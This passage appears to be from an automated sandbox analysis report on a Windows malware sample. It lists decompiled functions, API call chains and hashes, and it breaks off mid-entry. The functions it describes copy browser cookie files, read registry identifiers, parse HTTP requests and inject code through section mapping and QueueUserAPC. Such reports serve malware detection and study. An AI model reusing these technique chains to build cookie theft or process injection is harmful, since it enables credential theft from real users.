  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3D4D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 38registry
Similarity
  • Total matches: 38
  • API ID: RegCloseKeyRegQueryValueExwsprintf
  • String ID: Client
  • API String ID: 1809512201-3236430179
  • Opcode ID: 9042b19d19dd4b3d942996e0d3ea8ecf2d3d2b777e835d7718659b5b290a5e22
  • Instruction ID: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
  • Opcode Fuzzy Hash: 8CF04634A804C58A8693A885092A7FC4571B352AEECCCBF20F15852181FFC977D73B11
  • Instruction Fuzzy Hash: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,?), ref: 001DE242
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
  • RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
  • wsprintfA.USER32 ref: 001C3E55
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3C55, Relevance: 6.1, APIs: 4, Instructions: 67 Total matches: 64memoryregistry
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE1CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97 Total matches: 57memory
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DBD3F, Relevance: 10.7, APIs: 7, Instructions: 202 Total matches: 131native
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF422, Relevance: 10.6, APIs: 7, Instructions: 85 Total matches: 37registrylibraryloader
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CCB46, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 378 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C51AB, Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 438 Total matches: 26synchronizationmemorythread
Similarity
  • Total matches: 26
